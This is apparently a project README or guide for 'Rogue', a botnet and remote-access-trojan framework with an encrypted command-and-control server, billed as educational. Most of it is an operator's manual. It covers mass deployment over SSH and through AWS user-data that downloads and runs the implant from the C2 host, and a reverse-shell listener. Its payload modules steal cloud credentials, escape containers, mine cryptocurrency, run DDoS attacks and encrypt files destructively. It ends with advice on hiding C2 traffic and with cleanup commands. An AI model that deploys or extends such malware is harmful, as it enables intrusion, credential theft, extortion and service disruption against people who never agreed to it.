Rogue Botnet: Building and Understanding a Modular RAT w/C2 Framework

Rogue is an educational command-and-control (C2) botnet framework built for ethical hackers, red team operators, and defensive researchers. Version 3.2 introduces cloud‑aware implants, provider‑specific payloads (AWS, Azure, GCP, Kubernetes), a full web administration panel, and destructive file encryption modules. This is not a toy; it’s a professional grade testing platform that exposes the inner workings of modern botnets.

The project prioritises clarity over obfuscation. Every encrypted packet, every persistence mechanism, and every cloud detection routine is laid bare so you can learn, adapt, and defend.

░▒▓███████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░        
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░        
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓██████▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░        
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░        
░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓████████▓▒░

>_ Disclaimer – Read Before Touching Code

Rogue is provided strictly for educational and authorised testing purposes.
The file encryption payload (fileransom.py) is destructive – it permanently removes original files during encryption.
Cloud exploitation modules (AWS/Azure/GCP credential harvesters, container escapes) must only be used on environments you own or have explicit written permission to test.

You assume full liability for misuse. The author grants no warranty and accepts no responsibility for data loss, legal consequences, or system damage.

>_ What’s New in v3.2 – Cloud Warfare

Cloud‑Aware Implant – automatic detection of AWS, Azure, GCP, Docker, Kubernetes
Cloud‑Specific Tactics – persistence and evasion adapted to each cloud provider
Cloud Operations Tab – dedicated web interface for cloud exploitation
5 New Cloud Payloads – credential stealers for AWS/Azure/GCP, container escape, K8s secret stealer
Advanced Payload Suite – process injection, advanced file hiding, cron persistence, competitor cleaner
File Encryption Payload – AES‑256 encryption/decryption (destructive)
Compound Operations – trigger_full_recon, trigger_harvest_all, trigger_clean_sweep
Ngrok Integration – automatic tunnel for C2 behind NAT

>_ Installation – Spinning Up the C2

Tested on Kali Linux / Debian (bare metal or VM). Python 3.8+ required.

git clone https://github.com/ekomsSavior/rogue.git
cd rogue
sudo apt update
sudo apt install python3 python3-pip python3-dev python3-venv -y

# Core dependencies
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput --break-system-packages

# Cloud & advanced features
pip3 install boto3 azure-identity google-cloud-storage kubernetes pyautogui python-nmap secretstorage --break-system-packages

If you prefer a venv (cleaner, but who has time):

python3 -m venv rogue_env
source rogue_env/bin/activate
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput boto3 azure-identity google-cloud-storage kubernetes pyautogui python-nmap secretstorage

Ngrok – Punching Through NAT

wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar -xvzf ngrok-v3-stable-linux-amd64.tgz
sudo mv ngrok /usr/local/bin/
ngrok config add-authtoken YOUR_NGROK_AUTH_TOKEN

>_ File Structure – Know Your Arsenal

File / Directory	Purpose
`rogue_c2.py`	AES‑encrypted C2 server with web admin panel
`rogue_implant.py`	Deployable implant – cloud detection, persistence, fallback
`payloads/`	Modular scripts (cloud stealers, DDoS, miner, process injection, file encryption, etc.)
`rogue_env/`	Optional virtual environment

>_ Core Architecture – How the Snake Moves

AES‑256 Encrypted Channel

All traffic between implants and the C2 is encrypted with a shared 16‑byte key. Hardcoded in both rogue_c2.py and rogue_implant.py – for real ops, rotate per engagement.

Cloud Detection & Adaptation (v3.2)

On startup, the implant probes:
- http://169.254.169.254/latest/meta-data/ → AWS EC2
- http://169.254.169.254/metadata/instance?api-version=2021-02-01 → Azure VM
- http://metadata.google.internal/computeMetadata/v1/ → GCP
- /.dockerenv or cgroup entries → Docker / Kubernetes

Based on the detected environment, the implant automatically:
- Chooses hidden directories (~/.cache/.rogue, /var/lib/cloud/.cache, etc.)
- Adapts persistence (cloud‑init user‑data for AWS, VM extensions for Azure, startup scripts for GCP)
- Pre‑fetches relevant cloud payloads

Payload Loader

The C2 hosts a simple HTTP server (port 8000). Implants fetch payloads from PAYLOAD_REPO and execute them via run_payload or load_payload.

Trigger System

Pre‑defined triggers like trigger_mine, trigger_ddos, trigger_aws_creds execute built‑in or downloaded modules. Triggers can be issued to all connected bots or a single bot (target <index>).

Peer‑to‑Peer Fallback

If the primary C2 goes dark, implants broadcast UDP discovery packets to locate other Rogue nodes on the same network, then switch to a secondary C2.

Persistence – You Can’t Kill What Keeps Coming Back

The implant hides in ~/.cache/.rogue and adds a stub to .bashrc. Cloud‑aware persistence modifies cloud‑init, custom script extensions, or Kubernetes cron jobs.

>_ Running the C2 – Light It Up

python3 rogue_c2.py

Sample output:

============================================================
 ROGUE C2 SERVER - Complete Command & Control
============================================================
[+] Exfil listener started on port 9091
[+] Reverse shell listener started on port 9001
[*] Starting ngrok tunnel...
[+] C2 SERVER IS LIVE!
[NGROK] C2 URL: https://your-subdomain.ngrok-free.dev
[ADMIN] Web Panel: http://localhost:4444/admin
[CLOUD] 5 Cloud Payloads Added
[ADVANCED] 4 Advanced Payloads Added
[FILE ENCRYPTION] System-wide modes: system_test, system_user, system_aggressive, system_destructive

Web panel: http://localhost:4444/admin
Ngrok tunnel: https://*.ngrok-free.dev – implants use this URL.

>_ Deploying an Implant – Own the Box

Copy rogue_implant.py to the target.
Edit these variables:

C2_HOST = 'your-subdomain.ngrok-free.dev'
C2_PORT = 4444
PAYLOAD_REPO = "https://your-subdomain.ngrok-free.dev/payloads/"
SECRET_KEY = b'16_byte_shared_key'   # must match rogue_c2.py

Run:

python3 rogue_implant.py

Mass Deployment – Spread the Plague

SSH to Linux hosts:

for ip in $(cat targets.txt); do
    scp rogue_implant.py user@$ip:/tmp/
    ssh user@$ip "cd /tmp && python3 rogue_implant.py &"
done

AWS EC2 via user‑data:

cat > user-data.sh << 'EOF'
#!/bin/bash
wget https://your-c2.ngrok-free.dev/payloads/rogue_implant.py -O /tmp/rogue.py
python3 /tmp/rogue.py &
EOF
aws ec2 run-instances --image-id ami-12345678 --user-data file://user-data.sh

Docker container – break the sandbox:

docker cp rogue_implant.py container_name:/tmp/
docker exec container_name python3 /tmp/rogue_implant.py &

>_ Hosting Payloads – Feed the Horde

The C2 automatically serves payloads from payloads/ via ngrok. Manual server:

cd payloads
python3 -m http.server 8000

Ensure PAYLOAD_REPO in rogue_implant.py points to the correct URL.

>_ Command Syntax – C2 Console

Once bots connect, use target <index> to select a specific bot, or issue commands to all.

Command	Description
`list`	Show connected bots (cloud environment badge)
`target 2`	Switch to bot #2
`load_payload mine.py`	Download `mine.py` from HTTP server
`run_payload mine.py`	Execute the module
`reverse_shell`	Open reverse shell on port 9001 (run `nc -lvnp 9001` first)
`trigger_mine`	Execute mining payload on all bots
`trigger_ddos <target> <port> <duration> <threads> <mode>`	Launch DDoS
`trigger_aws_creds`	Harvest AWS credentials
`trigger_container_escape`	Break out of Docker
`trigger_fileransom encrypt /path [password]`	DESTRUCTIVE – encrypt files
`help`	Show all commands

>_ Payload Reference – The Sharp End

Core Payloads (pre‑v3.2)

mine.py – Monero CPU miner (SHA256)
Edit WALLET and POOL. Real pool required for yield.

ddos.py – Multi‑mode DDoS engine
Modes: http, udp, tcp. Optional Tor routing (USE_TOR = True).

sysrecon.py – System recon (hardware, network, users, processes, defences)
Trigger: trigger_sysrecon

linpeas_light.py – Linux privilege escalation checker
Trigger: trigger_linpeas

hashdump.py – Extract password hashes (/etc/shadow, SSH keys, browser creds)
Trigger: trigger_hashdump

Advanced Payloads (v3.1+)

Payload	Trigger	Description
`process_inject.py`	`trigger_procinject`	Inject into systemd, sshd, nginx, apache – memory‑only
`advanced_filehider.py`	`trigger_filehide`	Hide files using extended attributes, dot prefixes, filesystem tunneling
`advanced_cron_persistence.py`	`trigger_cronpersist`	Obfuscated cron with randomised schedules, self‑healing
`competitor_cleaner.py`	`trigger_compclean`	Detect and remove other malware families / backdoors

Cloud Payloads (v3.2 – new)

Payload	Trigger	Target
`cloud_detector.py`	`trigger_cloud_detect`	AWS/Azure/GCP/Docker/K8s fingerprinting
`aws_credential_stealer.py`	`trigger_aws_creds`	IAM roles, metadata, `~/.aws/`, env vars
`azure_cred_harvester.py`	`trigger_azure_creds`	Managed identity tokens, Azure CLI, service principals
`gcp_cred_stealer.py`	`trigger_gcp_creds`	GCP metadata, `~/.config/gcloud`, access tokens
`container_escape.py`	`trigger_container_escape`	Docker socket, privilege escalation, mount namespace breakout
`k8s_secret_stealer.py`	`trigger_k8s_creds`	Kubernetes secrets, service account tokens, configmaps

Cloud detection output example:

[CLOUD] Provider: AWS (confidence: high)
[CLOUD] Metadata: i-0a1b2c3d4e5f67890, us-east-1
[CLOUD] Adapted persistence: cloud-init user-data

Destructive Payload – File Encryption

fileransom.py – AES‑256 encryption/decryption.
WARNING: Original files are permanently removed. Recovery requires the exact password.

trigger_fileransom encrypt /home/user/Documents mySecretPassword
trigger_fileransom decrypt /home/user/Documents mySecretPassword

If no password, a random 32‑char string is generated and saved to encryption_log.txt on target.

>_ Web Interface – Command from the Throne

Access: http://localhost:4444/admin

Tab	Function
Active Bots	List implants with cloud environment badge. Send commands, view queues.
Operations	Pre‑built triggers (recon, cred access, persistence, cloud ops, compound ops).
Payloads	Browse and load all payloads – cloud, advanced, core. Colour‑coded badges.
Advanced	Process injection, advanced file hider, cron persistence, competitor cleaner.
Cloud Ops	Dedicated panel: cloud detection, AWS/Azure/GCP harvesting, container escape, K8s secret stealer, full cloud scanner.
Results	Command output history, filterable by bot ID.
Server Status	Uptime, ngrok URL, active bot count, payload counts.

Cloud Ops – Quick Commands

trigger_cloud_detect          # Identify environment
trigger_cloud_recon           # Provider‑specific intel
trigger_aws_creds             # Steal AWS keys
trigger_azure_creds           # Steal Azure tokens
trigger_container_escape      # Break out of Docker
trigger_k8s_creds             # Harvest Kubernetes secrets
trigger_cloud_scan full       # Metadata + credentials + resources

>_ Extending Rogue – Red Team Hardening

The base framework is raw. For real operations, add these layers:

Obfuscate C2 Infrastructure

Redirectors – Proxy through VPS instances to hide real C2 IP.
Domain Fronting – Abuse CDNs (CloudFront, Fastly) to disguise C2 traffic.
Tor Hidden Service – Host C2 as an .onion address.

Alternative Communication Channels

Email (SMTP/IMAP) – Use a compromised mailbox as dead‑drop.
Social Media – Monitor Twitter / Reddit posts for encoded commands.

>_ Emergency Removal & Forensics – Burn It All

If you need to clean a compromised test system:

General Linux

sudo pkill -9 -f rogue
rm -rf ~/.cache/.rogue
sudo sed -i '/rogue/d' ~/.bashrc /etc/cron.d/*

AWS EC2

sudo pkill -9 -f rogue
sudo rm -rf /var/lib/cloud/.cache/rogue*
sudo sed -i '/ROGUE/d' /etc/cloud/cloud.cfg

Docker / Kubernetes

# Inside container
pkill -9 -f rogue
rm -rf /.cache/.rogue

# If escape succeeded, check host for rogue processes
ps aux | grep -E "docker|containerd" | grep -v grep

IoC Detection – Cloud Environments

AWS: unexpected IMDSv2 queries, new IAM role usage, CloudTrail GetCallerIdentity spikes.
Azure: managed identity token requests from unusual source IPs, custom script extension installations.
GCP: metadata API calls, service account key creation.
Containers: docker.sock mounts, --privileged flag, hostPID sharing.

>_ Final Thoughts – Know Your Enemy

Rogue is a complete educational C2 framework that mirrors real‑world cloud‑aware malware. By studying its source – from AES encryption and payload loading to cloud metadata harvesting and container escape – you gain the insight needed to defend modern infrastructures.

Do not just run it. Break it. Rebuild it. Add your own payloads. Write detection rules. Then use that knowledge to harden your own systems.

Clone the repository:
https://ek0mssavi0r.dev/tools/rogue
https://github.com/ekomsSavior/rogue
https://churchofmalware.org

Follow the author for more offensive security research:
https://instagram.com/ekoms.is.my.savior

Remember: With great power comes great responsibility. Use this tool only in isolated labs or with written authorisation. The author assumes no liability for misuse, data loss, or legal consequences.

For authorised security testing only.